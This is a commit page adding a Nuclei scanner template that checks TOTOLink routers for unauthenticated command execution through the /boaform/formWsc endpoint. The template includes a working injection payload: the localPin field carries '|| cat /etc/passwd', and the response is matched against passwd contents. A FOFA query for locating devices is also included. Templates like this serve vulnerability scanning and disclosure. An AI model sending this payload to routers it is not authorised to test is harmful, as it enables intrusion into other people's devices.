Skip to content

Commit a37aa8c

Browse files
authored
Merge pull request #12425 from projectdiscovery/totolink-boaform-rce
Create totolink-boaform-rce.yaml
2 parents 7266cbe + 0fd36f6 commit a37aa8c

1 file changed

Lines changed: 51 additions & 0 deletions

File tree

Lines changed: 51 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
id: totolink-boaform-rce
2+
3+
info:
4+
name: TOTOLink Router - Remote Command Execution
5+
author: ritikchaddha
6+
severity: critical
7+
description: |
8+
TOTOLink routers are vulnerable to unauthenticated remote command execution via the /boaform/formWsc endpoint. An attacker can inject OS commands through the localPin parameter.
9+
reference:
10+
- https://github.com/fizz-is-on-the-way/Iot_vuls/blob/main/N150RT/RCE_formWsc/README.md
11+
classification:
12+
cwe-id: CWE-78
13+
metadata:
14+
max-request: 2
15+
product: TOTOLINK
16+
fofa-query: title="TOTOLINK"
17+
tags: totolink,rce,router,boaform
18+
19+
flow: http(1) && http(2)
20+
21+
http:
22+
- raw:
23+
- |
24+
GET / HTTP/1.1
25+
Host: {{Hostname}}
26+
27+
matchers:
28+
- type: dsl
29+
dsl:
30+
- 'status_code==200'
31+
- 'contains(tolower(body), "totolink")'
32+
condition: and
33+
internal: true
34+
35+
- raw:
36+
- |
37+
POST /boaform/formWsc HTTP/1.1
38+
Host: {{Hostname}}
39+
Content-Type: application/x-www-form-urlencoded
40+
41+
targetAPMac=001A2B3C4D5E&targetAPSsid=3232&submit-url=aaaaaa&localPin=aaaa%20||%20cat%20/etc/passwd
42+
43+
matchers-condition: and
44+
matchers:
45+
- type: regex
46+
regex:
47+
- "root:.*:0:0:"
48+
49+
- type: status
50+
status:
51+
- 200

0 commit comments

Comments
 (0)